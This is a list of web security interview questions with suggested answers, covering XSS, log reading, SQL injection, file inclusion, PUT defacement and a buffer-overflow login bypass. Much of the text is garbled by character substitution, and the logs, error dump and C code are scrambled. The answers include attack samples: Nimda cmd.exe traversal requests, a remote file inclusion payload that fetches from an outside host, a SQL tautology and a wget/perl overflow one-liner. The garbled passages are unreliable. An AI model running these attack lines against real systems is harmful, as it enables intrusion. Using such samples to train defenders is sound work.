Web Security Interview Questions

The goal of this document is to provide appropriate questions for HR/ anagers to pose to individuals who are applying for web security related positions! These questions do not have right or wrong answers" but rather spar# relevant conversation between the applicant and the hiring staff!

Entry Level Questions 1. What do you see as the most critical and current threats effecting Internet accessible websites? $oal of question % To gauge the applicant&s #nowledge of current web related threats! Topics such as 'enial of Service" (rute )orce" (uffer *verflows" and Input +alidation are all relevant topics! Hopefully they will mention information provided by web security organi,ations such as the Web -pplication Security .onsortium /W-S.0 or the *pen Web -pplication Security 1ro2ect /*W-S10! 2. What online resources do you use to keep abreast of web security issues? Can you give an example of a recent web security vulnerability or threat? $oal of question % 'etermine if the applicant utili,es computer security resources such as .3RT" S-4S Internet Storm .enter or I.-T! 3mail lists such as securityfocus" bugtraq" S-4S 5RIS6" etc! are also good resources! Recent e7amples of threats will vary depending on current events" but issues such as new web based worms /1H1 Santy Worm0 or applications" which are in wide use /awstats scripts0 are acceptable! 8! What do you see as challenges to successfully deploying/monitoring web intrusion detection9 $oal of question % We are attempting to see if the applicant has a wide #nowledge of web security monitoring and I'S issues such as: imitations of !I"# for web monitoring $## % semantic issues with understanding &''()

(roper logging * increasing the verboseness of logging $+od,#ecurity audit,log) -emote Centrali.ed ogging /lerting +echanisms 0pdating #ignatures1(olicies

;! What is your definition of the term <.ross=Site Scripting>9 What is the potential impact to servers and clients9 2oal of 3uestion *'his 3uestion will determine if the applicant is well versed in the terminology used in web security. 'he applicant needs to be able to articulate highly technological topics to a wide audience. 'he second 3uestion will help to verify that the applicant fully understands how 4## attacks work and the impact to client information. W/#C has a web security glossary of terms that may be of help 5 http611www.webappsec.org1glossary.html Cross-Site Scripting: (Acronym XSS) An attack technique that forces a web site to echo client-supplied data, which execute in a user s web browser! "hen a user is #ross-Site Scripted, the attacker will ha$e access to all web browser content (cookies, history, application $ersion, etc)! XSS attacks do not typically directly tar%et the web ser$er or application, but are rather aimed at the client! &he web ser$er is merely used as a conduit for the XSS data to be presented to the end client! See also '#lient-Side Scriptin%(! ?! What are the most important steps you would recommend for securing a new web server9 Web application9 2oal of 3uestion * 7nce again% there is no right or wrong answer% however we are interested in what the applicant views as important. Web #erver #ecurity6 0pdate1(atch the web server software +inimi.e the server functionality * disable extra modules "elete default data1scripts Increase logging verboseness 0pdate (ermissions17wnership of files Web /pplication #ecurity6 +ake sure Input 8alidation is enforced within the code 5 #ecurity 9/ testing

Configured to display generic error messages Implement a software security policy -emove or protect hidden files and directories

Advanced Level Questions 1. Imagine that we are running an /pache reverse proxy server and one of the servers we are proxy for is a Windows II# server. What does the log entry suggest has happened? What would you do in response to this entry?
68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/syste !2/ c ".e#e$/c%"ir &TT'/1.0" 200 566 "-" "-" 68.48.142.117 - - [09/Mar/2004:22:2!:48 -0500] "GET /c/winnt/syste !2/ c ".e#e$/c%t(t)*20-*2068.48.142.117*20GET*20c++,.",,*20c:--.tt)+"/c.",, &TT'/1.0" 200 566 "-" "-"

$oal of question % To see if the applicant is fluent at reading web server log files in the .ommon @og )ormat /.@)0! In this scenario" the client system /AB!;B!C;D!CCE0 is infected with the 4imda worm! These requests will not affect our -pache pro7y server since this is a icrosoft vulnerability! While it does not impact -pache" the logs do indicate that the initial request was successful /status code of DFF0! The 4imda worm will only send the level D request /trying to use Trivial )T1 to infect the target0 if the initial request is successful! 'epending on the e7act pro7ying rules in place" it would be a good idea to inspect the internal IIS server to verify that it has not been compromised! If you were not using /pache as the reverse proxy% what +icrosoft application1tool could you use to mitigate this attack? Gou could use either icrosoftHs Internet and Security -cceleration /IS-0 server as a front=end pro7y or implement IR@Scan on the target IIS server! The urlscan!ini file has the -llow'otIn1ath directive which will bloc# directory traversal attempts! 2. :ou are engaged in a penetration5test where you are attempting to gain access to a protected location. :ou are presented with this login screen6

What are some examples of you how you would attempt to gain access? $oal of question % 'etermine if the applicant has a wide #nowledge of different authentication vulnerabilities! They may attempt default usernames/passwords or attempt SQ@ In2ection queries that provide an SQ@ true statement /such as % J *R CKCL0! If they provide SQ@ e7amples" then offer them the following 3rror document information and as# them what this indicates!
0123 Err+r 3+"e 4 !7000 56ynta# err+r +r access 7i+,ati+n8 [Micr+s+(t][0123 69: 6er7er 1ri7er][69: 6er7er]:ine 4: ;nc+rrect synta# near <4<. 1ata 6+=rce 4 "E3+ erceT.e>rc.6=))+rt2" S)* + ,S-*-#& )uick.ump/0tems!0tem0d 1234 )uick.ump/0tems "5-2)uick.ump/0tems!0tem0d 67 8 A9: )uick.ump0d +, T.e err+r +cc=rre" w.i,e )r+cessin? an e,e ent wit. a ?enera, i"enti(ier +( 53@9AEBC8D +cc=)yin? "+c= ent )+siti+n 51:18 t+ 51:428 in t.e te ),ate (i,e E:-;net'=/-c,ients-,+?in-.tt)-ai, ent.c( T.e s)eci(ic seF=ence +( (i,es inc,="e" +r )r+cesse" is: E:-;GET'A2-3:;EGT6-:0G;G-&TT'->;:MEGT.3@M

This error message indicates that the target web application if running icrosoft SQ@ and discloses directory structures! ;. What application generated the log file entry below? What type of attack is this? /ssuming the index.php program is vulnerable% was this attack successful?
4444444444444444444444444444444444444444 BeF=est: 200.158.8.207 - - [09/0ct/2004:19:40:46 --0400] "'06T /in"e#.).) &TT'/1.1" 40! 74! &an",er: c?i-scri)t ---------------------------------------'06T /in"e#.).) &TT'/1.1 &+st: www.(++.c+ 3+nnecti+n: Hee)-a,i7e >cce)t: I/I

>cce)t-:an?=a?e: en-=s 3+ntent-Enc+"in?: ?Ji)D "e(,ate 3+ntent-Ty)e: a)),icati+n/#-www-(+r -=r,enc+"e" Aser->?ent: M+Ji,,a 4.0 5:in=#8 3+ntent-:en?t.: 65 K-@+rwar"e"-@+r: 200.158.8.207 +"Lsec=rity- essa?e: >ccess "enie" wit. c+"e 40!. 'attern '06TL'>C:0>1 +"Lsec=rity-acti+n: 40!

atc. "=na e-#20-a" at

65 ,i"4.tt)://t.!.+wnJ.)5.+r?.=H/,i,a.M)?$Nc "4c" /t )Oi"O,s=na e -a

$oal of question % to verify that the applicant can interpret various web log files" identify attac#s and possible impacts! The odMSecurity -pache module generated this data in the auditMlog file! The log entry indicates that an attac#er is attempting to e7ploit a 1H1 file inclusion vulnerability in the inde7!php script! The commands being passed are in the 1*ST 1-G@*-' of the command! This attac# was not successful for the following two reasons: The modMsecurity=message header indicates that odMSecurity bloc#ed this request based on a converted Snort web=attac# rule when it identified the <uname %a> data in the 1*ST 1-G@*-'! The attac#er also made a typo in the *S commands being passed in the 1*ST 1-G@*-'! She did not include a semicolon <N> between the ls and uname commands! The target host would fail to e7ecute the <lsuname> command!

<. 7ne of your web servers is logging multiple re3uests similar to the following6
201.1.199.155 - - [26/1ec/2004:01:55:48 -0500] "'AT /.acHe"..t 1ata >ccess ;nternet '=/,is.in? 'r+7i"er 1>R 1.1P Q-Q &TT'/1.0P 40! 769 QMicr+s+(t

What does this log entry indicate? &ow could you identify what the contents are of the =hacked.htm> file that the attacker is trying to upload? $oal of question % 'etermine if the applicant can identify both the attac# /a web defacement attempt using the HTT1 1IT ethod0" as well as" the logging limitations of .@)! In this type of attac#" the defacement te7t is sent in the request body and not on the IR@ Request line! In order to identify this data" a networ# sniffing application would need to be utili,ed! -n application such as Snort

could be used with a custom rule to identify this activity! Here is an e7ample rule %
a,ert tc) SEKTEBG>:LGET any -T S&TT'L6EBREB6 S&TT'L'0BT6 5 s?:":03>: '=t atte )t"O (,+w:t+Lser7erDesta/,is.e"O ta?:sessi+nD50D)acHetsO )cre:"/U'AT />"O si":!000001O re7:1O8

?. :ou have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. 'he file is called =logon,validate> and a typical logon re3uest looks like this *
QGET /c?i-/in/,+?+nL7a,i"ate$,+?in4testN)assw+r"4testP

The source code is shown below

void show_error(void) { // AUTHENTICATION ERROR exit(-1); } i t !"i (i t "r#$% $h"r &&"r#v) { $h"r error_o _"'th()1); $h"r 'ser*1+,-; $h"r ."ss*1+,-; $h"r &$h_.tr_/e#i ; $h"r &$h_.tr_e d; /&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/ /& 0et User "!e 1ro! 2'er3 4tri # &/ /&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/ $h_.tr_/e#i (($h"r &)strstr(&&&&2UER5_4TRIN0&&&&%67o#i (6); i1 ($h_.tr_/e#i ((NU88) show_error(); $h_.tr_/e#i 9(:; $h_.tr_e d(($h"r &)strstr($h_.tr_/e#i %6;6); i1 ($h_.tr_e d((NU88) show_error(); &($h_.tr_e d99)()<=); str$.3('ser%$h_.tr_/e#i ); /&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/ /& 0et >"ssword 1ro! 2'er3 4tri # &/ /&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/ $h_.tr_/e#i (($h"r &)strstr($h_.tr_e d%6."ssword(6); i1 ($h_.tr_/e#i ((NU88) show_error(); $h_.tr_/e#i 9(?;

$h_.tr_e d(($h"r &)strstr($h_.tr_/e#i %6;6); i1 ($h_.tr_e d@(NU88) &($h_.tr_e d99)()<=); str$.3(."ss%$h_.tr_/e#i ); i1 ((str$!.('ser%0OOA_U4ER)((=) ;; (str$!.(."ss%0OOA_>A44)((=)) error_o _"'th()=); i1 (error_o _"'th(()=)) { // AUTHENTICATION OB@@ } e7se { // AUTHENTICATION ERROR show_error(); } // ret'r (=); hehe $o'7d /e evi7 ;>>>>> exit(=); }

&his pseudo-code is taken from the 9;Sec "eb Auth ;ames http<==qui>!n%sec!bi><?8?8=%ame@=le$elA=replicant!php

"o you see any problems with this script? &ow could an attacker exploit this script to bypass the authentication mechanisms in this script? What are some mitigation options? $oal of question % This is most li#ely the most comple7 question being as#ed during the interview due to the fact that the applicant will need to apply multiple layers of analysis" including both the attac#er and defender perspectives! Reference <Smashing The Stac# )or )un -nd 1rofit> for technical details % http://www!phrac#!org/phrac#/;O/1;O=C; The security issue with this script has to do with a buffer overflow problem in the way that the script is using the <errorMonMauth> condition! The errorMonMauth condition is initially declared to be <C> which means that he user is not authenticated! The <user> condition was declared directly after the errorMonMauth and has been allocated CDB bytes! 'ue to the ordering of the declaration of the errorMonMauth and user parameters" they occupy ad2acent locations on

the running stac#! The result is that if the attac#er submits a username that is CDO bytes /with the last byte being <F>0" they can overwrite the errorMonMauth data! - Ini7 command such as the following would achieve this goal %
http<==www!companyx!com=c%i-bin=$alidate/lo%onBlo%on+888888888888888888888888 88888888888888888888888888888888888888888888888888888888888888888888888888888 8888888888888888888888888888

or
V w?et .tt)://www.c+ )any#.c+ /c?i-/in/7a,i"ateL,+?+n$,+?+n4W)er, -e )rint "0"#129W

itigation options include the following: Ipdate the validateMlogon soruce code to fi7 the problem" such as using strncpy/0 instead of strcpy /0! If the source code could not be updated" then security filters would need to be implemented on the web server! Ising odMSecurity" you could implement some security filters for the <validateMlogon> IR@ such as these: o *nly allow letters in the username argument! This would prevent the client from overwriting the errorMonMauth data with a ,ero!
X:+cati+n /c?i-/in/7a,i"ateL,+?+nT 6ec@i,ter6e,ecti7e >BGL:0G;G QYU[a-J>-Z]P X/:+cati+nT

o Gou could also add another rule to restrict the si,e of the username/password arguments to be less then CDO characters!
6*ocation =c%i-bin=$alidate/lo%on7 Sec1ilterSelecti$e A2;/*3;09 'CDEa->A-FG( Sec1ilterSelecti$e A2;/*3;09HA2;/IASS"32: '!J@KL,M( 6=*ocation7

> we/ a)),icati+n (irewa,, 5[>@8 "e7ice c+=," /e i ),e ente" +n t.e netw+rH t+ )r+tect t.e entire we/ site. T.ese "e7ices .a7e )+siti7e )+,icy ca)a/i,ity t.at s.+=," i"enti(y t.ese ty)es +( attacHs as "an+ a,+=s" an" "eny t.e . > /rie( ,istin? +( [>@ 7en"+rs inc,="e Ter+sD Getc+nti== D ; )er7aD [atc.(ireD 2reac.D >#i,ianceD an" +t.ers.